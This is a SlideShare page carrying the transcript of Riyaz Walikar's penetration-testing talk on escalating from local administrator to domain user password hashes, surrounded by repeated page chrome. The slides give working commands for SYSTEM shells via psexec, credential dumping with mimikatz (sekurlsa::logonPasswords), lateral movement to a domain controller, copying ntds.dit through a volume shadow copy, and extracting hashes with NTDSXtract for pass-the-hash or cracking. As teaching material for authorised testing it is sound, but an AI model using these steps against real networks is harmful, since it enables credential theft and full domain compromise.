Your SlideShare is downloading. ×
0
Fall of a domain | From local admin to Domain user hashes
Fall of a domain | From local admin to Domain user hashes
Fall of a domain | From local admin to Domain user hashes
Fall of a domain | From local admin to Domain user hashes
Fall of a domain | From local admin to Domain user hashes
Fall of a domain | From local admin to Domain user hashes
Fall of a domain | From local admin to Domain user hashes
Fall of a domain | From local admin to Domain user hashes
Fall of a domain | From local admin to Domain user hashes
Fall of a domain | From local admin to Domain user hashes
Fall of a domain | From local admin to Domain user hashes
Fall of a domain | From local admin to Domain user hashes
Fall of a domain | From local admin to Domain user hashes
Fall of a domain | From local admin to Domain user hashes
Fall of a domain | From local admin to Domain user hashes
Fall of a domain | From local admin to Domain user hashes
Fall of a domain | From local admin to Domain user hashes
Fall of a domain | From local admin to Domain user hashes
Fall of a domain | From local admin to Domain user hashes
Fall of a domain | From local admin to Domain user hashes
Fall of a domain | From local admin to Domain user hashes
Fall of a domain | From local admin to Domain user hashes
Fall of a domain | From local admin to Domain user hashes
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Fall of a domain | From local admin to Domain user hashes

3,178

Published on

Author: Riyaz Walikar

Author: Riyaz Walikar

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
3,178
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
26
Comments
0
Likes
1
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. The Fall of a Domain LOCAL ADMIN TO DOMAIN USER HASHES Riyaz Walikar
  • 2. Disclaimer  It was far more painstaking and complicated than this!  Demo setup to show execution path  All the commands were actually used in the pentest  Please do not try this on your office/corporate environment without written permission
  • 3. Please exercise caution!
  • 4. The story so far  Remote RDP access to a machine on the client network via VPN  Local Administrator rights to simulate an employee  User is a limited domain user  Domain controller on the same network, reachable with LDAP services running
  • 5. Visually. This.
  • 6. Local Admin eh?  Locally logged in as TARDISfwhite  Domain limited user but local admin  Other users connected? [Task Manager > Users]  Found another user connected to our system via RDP –sweet! (possibly domain admin )  Need system privs! Any ideas?
  • 7. Think Sysinternals!  psexec –s –i cmd.exe
  • 8. Dump connected user credentials  mimikatz – Benjamin Delpy  Extracts plaintext passwords from memory  Wdigest, tspkg, kerberos and many more  mimikatz  privilege::debug  token::elevate  sekurlsa::logonPasswords
  • 9. Windows (In)Security?
  • 10. Now what? http://gapingvoid.com/2008/06/13/now-what/
  • 11. Remote CMD anyone?  RDP directly!  Lets be discreet   psexec -s –u TARDISatomboy 10.10.10.1 cmd.exe  Game already over!  Instead RDP with user credentials and present report
  • 12. Lets grab some hashes   Active Directory stores user information in %systemroot%ntdsntds.dit  Locked during system usage  ntdsutil + snapshot = backup (> Windows 2008)  vssadmin create shadow /for=C: (> Windows 2003)
  • 13. Lets grab some hashes   backup readable by nt authoritysystem and administrators  We need the ntds.dit and SYSTEM files  cd / dir /other inbuilt cmd commands do not work on unmounted volume shadow copies  copy works!
  • 14. Core files needed
  • 15. NTDS.dit structure parse?  NTDSXtract - A framework for offline forensic analysis of ntds.dit  Need the libesedb module as well  libesedb and creddump in ntds_dump_hashes.zip  wget to a linux box (Kali is a good choice)
  • 16. get framework + compile + make + run  wget http://ntdsxtract.com/downloads/ntdsxtract/ntdsxt ract_v1_0.zip  wget http://ntdsxtract.com/downloads/ntds_dump_hash .zip  unzip both
  • 17. get framework + compile + make + run  cd ntds_dump_hash/libesedb  ./configure && make  cd libesedb/esedbtools  ./esedbexport -l /tmp/ntds.log <ntds.dit>
  • 18. Yay!  python ../../ntdsxtract/dsusers.py datatable link_table --passwordhashes <system_file> – passwordhistory <system_file>  Cleanup the output with ntdstopwdump.py (https://raw.github.com/inquisb/miscellaneous/mas ter/ntdstopwdump.py)
  • 19. Now what? http://gapingvoid.com/2008/06/13/now-what/
  • 20. Pass the hash / Password Cracking!  Use the Windows Credentials Editor – Amplia Security  Password Cracking >> Humla perhaps 
  • 21. References  http://blog.gentilkiwi.com/mimikatz  http://www.ampliasecurity.com/research/wcefaq.ht ml  http://bernardodamele.blogspot.in/2011/12/dumpwindows-password-hashes_16.html
  • 22. Thank you riyazwalikar@gmail.com http://www.riyazwalikar.com

×